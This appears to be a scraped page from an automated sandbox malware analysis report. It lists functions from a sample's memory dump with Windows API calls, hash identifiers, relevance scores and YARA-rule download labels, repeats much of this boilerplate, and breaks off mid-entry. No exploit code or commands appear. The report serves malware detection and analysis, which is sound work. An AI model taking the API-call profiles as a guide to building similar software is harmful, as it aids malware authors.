                                                                                                                                                                                                                                                              • Instruction ID: aef6cf25d155275a0f1f0dba3ae7dc856cfafe516e6fd3ce68bd1cca54722f2f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fce1d974e300f46887b22a37e71dcc213f53c6413cec510bd16856115e4e31a8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8401B1B1A086009FD310DF25CC44AAAFBF8EF84314F50847FE489A3281D73456458B66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404FED Relevance: 42.5, APIs: 28, Instructions: 461windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ItemMessageSendWindow$ClassDestroyDialogEnableLongMenuShowText
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1257292352-0
                                                                                                                                                                                                                                                              • Opcode ID: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                                              • Instruction ID: 81f075938f45a7985b655ae660e62a259a3a74716ec96c8beebe6fa6edba758e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B12EDB0904700EFD720AF69D98876FBBF4EB84714F50893EE88497290D7789885DF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004057B5 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 246windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Item$Cursor$ButtonCheckColorExecuteShell
                                                                                                                                                                                                                                                              • String ID: #$Lq
                                                                                                                                                                                                                                                              • API String ID: 3348721118-2799278461
                                                                                                                                                                                                                                                              • Opcode ID: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                                              • Instruction ID: 44f7cc544d88e5f9b0c99828474254857af221e4d6201ddb95d9c50adba5cc38
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5B1E7B0908704AFD710AF69D58876EBBF0FF44314F40892DE889A7381D779A885CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              • API String ID: 2207649800-2684343615
                                                                                                                                                                                                                                                              • Opcode ID: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                                              • Instruction ID: 8fd51326f023e27f82ac7456779bc240a2534a06902e8bdd8a27472bfc587b1b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 046115B09047089FCB24DFA9C9885AEBBF8FF88310F50892EE499D7251D734A845DF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00408311 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 176filememoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 0040839D
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 004083C8
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004083FF
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32 ref: 0040845A
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 00408476
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?), ref: 004084A2
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00408568
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 0040858B
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00408597
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 004085A1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              • API String ID: 1472977481-2684343615
                                                                                                                                                                                                                                                              • Opcode ID: 2f688b72e527af7ea3e8ca39ec6c423c40bf0fcbc8cf1a14568df8390cd70205
                                                                                                                                                                                                                                                              • Instruction ID: 94d356f40ec1d5b6b18a4eade4987fc681b306d1f2835a3a3d653d78bc44f301
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f688b72e527af7ea3e8ca39ec6c423c40bf0fcbc8cf1a14568df8390cd70205
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70710AB0908305AFD710AF65DA8866FBBF4FF84704F50C82EE9C497251DB789445CB9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407E06 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 236stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?), ref: 00407EE6
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00407F25
                                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00407FC6
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
                                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32 ref: 00408018
                                                                                                                                                                                                                                                              • SHGetPathFromIDListA.SHELL32 ref: 00408073
                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32 ref: 00408084
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                              • API String ID: 3880481140-248832578
                                                                                                                                                                                                                                                              • Opcode ID: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                                              • Instruction ID: afc503830e017d1618816f2a7c40fbe451ee37b9332185e2dde12f9a903aaa14
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB918E71D082149FDB20DF69C9846AEBBF4EF48300F55853EE894A7381D738A845CB9B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404F0F Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                                                                              • Opcode ID: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                                              • Instruction ID: 1780d8928a2120b8c11af9b20abdfd96f0510a7958c84a0cc1c987df9bbb4b6c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF3128B09047069BDB10DFA8D988A6BBFE4BF48314F04886DFD94DB251D374D941CB66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403491 Relevance: 10.6, APIs: 7, Instructions: 132filememoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(759205F0), ref: 004034EF
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 0040351C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00403653
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403561
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004035D6
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 00403606
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00403612
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: SetFilePointer.KERNEL32 ref: 00403D89
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403DD5
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403E9A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Global$Read$AllocFreePointer$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2143033257-0
                                                                                                                                                                                                                                                              • Opcode ID: d7e3919c8c286aedf3d5e9b6ec29653afd9aab18416f1c8313dee9fff56ac6e6
                                                                                                                                                                                                                                                              • Instruction ID: 4c510bf6e2d4d1f92ab55f121e890243c90c0ce65b69a7146e7506ad40f7442f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e3919c8c286aedf3d5e9b6ec29653afd9aab18416f1c8313dee9fff56ac6e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51510BB0A087009FD710EF29C844B6EBBF4AF84315F01896EE598E7391D7389985CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040247C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectwsprintf
                                                                                                                                                                                                                                                              • String ID: H$Z
                                                                                                                                                                                                                                                              • API String ID: 1586071882-4221459494
                                                                                                                                                                                                                                                              • Opcode ID: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
                                                                                                                                                                                                                                                              • Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004039FE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403A48
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00403A83
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              • CreateDialogParamA.USER32 ref: 00403AC3
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 00403ADC
                                                                                                                                                                                                                                                                • Part of subcall function 0040392C: MulDiv.KERNEL32 ref: 00403953
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
